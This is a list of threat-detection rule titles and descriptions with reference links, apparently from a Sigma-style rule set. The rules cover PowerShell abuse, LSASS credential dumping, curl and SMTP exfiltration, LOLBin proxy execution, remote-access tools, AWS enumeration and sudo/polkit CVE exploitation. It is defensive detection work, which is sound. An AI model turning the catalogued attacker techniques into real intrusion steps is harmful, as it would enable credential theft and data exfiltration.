Uncommon PowerShell Hosts Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic Detects powershell execution with that make use of to the bxor (Bitwise XOR). Attackers might use as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1
Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host. https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps
Compress-Archive Cmdlet Execution Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md
Windows Mail App Mailbox Access Via PowerShell Script Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails. https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock Detects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
SMB over QUIC Via PowerShell Script Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
Potential Registry Reconnaissance Via PowerShell Script Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
Use Of Remove-Item to Delete File - ScriptBlock PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse" https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7
Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4, https://www.ietf.org/rfc/rfc2821.txt
WinAPI Library Calls Via PowerShell Scripts Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
WinAPI Function Calls Via PowerShell Scripts Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Potential Credential Dumping Attempt Via PowerShell Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
LSASS Access From Program In Potentially Suspicious Folder Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Uncommon GrantedAccess Flags On LSASS Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410 https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Potential Shellcode Injection Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject. https://github.com/EmpireProject/PSInject
Password Protected Compressed File Extraction Via 7Zip Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/
Set Files as System Files Using Attrib.EXE Detects the execution of "attrib" with the "+s" flag to mark files as system files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/
Potential BOINC Software Execution (UC-Berkeley Signature) Detects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized. https://boinc.berkeley.edu/, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
CMD Shell Output Redirect Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. https://ss64.com/nt/syntax-redirection.html
Potential File Override/Append Via SET Command Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input. https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1, https://ss64.com/nt/set.html
Headless Process Launched Via Conhost.EXE Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Dynamic .NET Compilation Via Csc.EXE - Hunting Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897
File Download Via Curl.EXE Detects file download using curl.exe https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
Curl.EXE Execution Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
Potential Data Exfiltration Via Curl.EXE Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html
Diskshadow Child Process Spawned Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
Curl.EXE Execution With Custom UserAgent Detects execution of curl.exe with custom useragent options https://curl.se/docs/manpage.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd
ClickOnce Deployment Execution - Dfsvc.EXE Child Process Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Diskshadow Script Mode Execution Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
Potential Proxy Execution Via Explorer.EXE From Shell Process Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be use to hunt for anomalies. Muddy Waters threat actor was seeing using this technique. https://twitter.com/CyberRaiju/status/1273597319322058752, https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/
Potential DLL Sideloading Activity Via ExtExport.EXE Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags was provided. https://lolbas-project.github.io/lolbas/Binaries/Extexport/, https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/, https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/, https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/
Potential Password Reconnaissance Via Findstr.EXE Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages https://steflan-security.com/windows-privilege-escalation-credential-harvesting/, https://adsecurity.org/?p=2288
New Self Extracting Package Created Via IExpress.EXE Detects the "iexpress.exe" utility creating self-extracting packages. Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Microsoft Workflow Compiler Execution Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/
CodePage Modification Via MODE.COM Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware. https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
Net.EXE Execution Detects execution of "Net.EXE". https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html, https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html, https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe
SMB over QUIC Via Net.EXE Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
Suspicious New Instance Of An Office COM Object Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic, https://github.com/med0x2e/vba2clr
Import New Module Via PowerShell CommandLine Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1
Unusually Long PowerShell CommandLine Detects unusually long PowerShell command lines with a length of 1000 characters or more https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html, https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
Potentially Suspicious PowerShell Child Processes Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. https://twitter.com/ankit_anubhav/status/1518835408502620162
Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver, https://ss64.com/nt/regsvr32.html
Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. Hunting Opportunity 1- Weed Out The Noise When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. https://twitter.com/Kostastsale/status/1646256901506605063?s=20, https://www.action1.com/documentation/
Remote Access Tool - Ammy Admin Agent Execution Detects the execution of the Ammy Admin RMM agent for remote management. https://www.ammyy.com/en/admin_features.html
Remote Access Tool - Cmd.EXE Execution via AnyViewer Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions. https://www.anyviewer.com/help/remote-technical-support.html
Remote Access Tool - ScreenConnect Remote Command Execution - Hunting Detects remote binary or command execution via the ScreenConnect Service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
DLL Call by Ordinal Via Rundll32.EXE Detects calls of DLLs exports by ordinal numbers via rundll32.dll. https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/, https://github.com/Neo23x0/DLLRunner, https://twitter.com/cyb3rops/status/1186631731543236608, https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver
Scheduled Task Creation From Potential Suspicious Parent Location Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
SC.EXE Query Execution Detects execution of "sc.exe" to query information about registered services on the system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery
Potential CommandLine Obfuscation Using Unicode Characters Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http
Potentially Suspicious Compression Tool Parameters Detects potentially suspicious command line arguments of common data compression tools https://twitter.com/SBousseaden/status/1184067445612535811
Elevated System Shell Spawned Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. https://github.com/Wh04m1001/SysmonEoP
EventLog Query Requests By Builtin Utilities Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
Potential Suspicious Execution From GUID Like Folder Names Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. https://twitter.com/Kostastsale/status/1565257924204986369
Execution From Webserver Root Folder Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors Internal Research
Tunneling Tool Execution Detects the execution of well known tools that can be abused for data exfiltration and tunneling. https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
File or Folder Permissions Modifications Detects a file or folder's permissions being modified or tampered with. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11), https://github.com/swagkarna/Defeat-Defender-V1.2.0
Manual Execution of Script Inside of a Compressed File This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native windows File Explorer capabilities. When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a, https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692
Process Terminated Via Taskkill Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process, https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
Suspicious Tasklist Discovery Command Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist
System Information Discovery Via Wmic.EXE Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/
Arbitrary Command Execution Using WSL Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642
Cab File Extraction Via Wusa.EXE Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Scheduled Task Created - Registry Detects the creation of a scheduled task via Registry keys. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5
Microsoft Office Trusted Location Updated Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01
Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/
Command Executed Via Run Dialog Box - Registry Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. https://www.forensafe.com/blogs/runmrukey.html, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
Service Binary in User Controlled Folder Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Shell Context Menu Command Tampering Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. https://mrd0x.com/sentinelone-persistence-via-menu-context/
AWS EC2 Download Userdata Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py
Potential Backup Enumeration on AWS Detects potential enumeration activity targeting an AWS instance backups https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Account Enumeration on AWS Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. None
Potential Network Enumeration on AWS Detects network enumeration performed on AWS. https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Potential Storage Enumeration on AWS Detects potential enumeration activity targeting AWS storage https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
AWS Lambda Function Created or Invoked Detects when an user creates or invokes a lambda function. https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
AWS Macie Evasion Detects evade to Macie detection. https://docs.aws.amazon.com/cli/latest/reference/macie/
Potential AWS Cloud Email Service Abuse Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Sign-in Failure Bad Password Threshold Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
CVE-2021-3156 Exploitation Attempt Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow. https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
CVE-2021-3156 Exploitation Attempt Bruteforcing Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing. required to trigger the heap-based buffer overflow. https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
Potential CVE-2021-4034 Exploitation Attempt Detects exploitation attempt of the vulnerability described in CVE-2021-4034. https://github.com/berdav/CVE-2021-4034, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034, https://access.redhat.com/security/cve/CVE-2021-4034
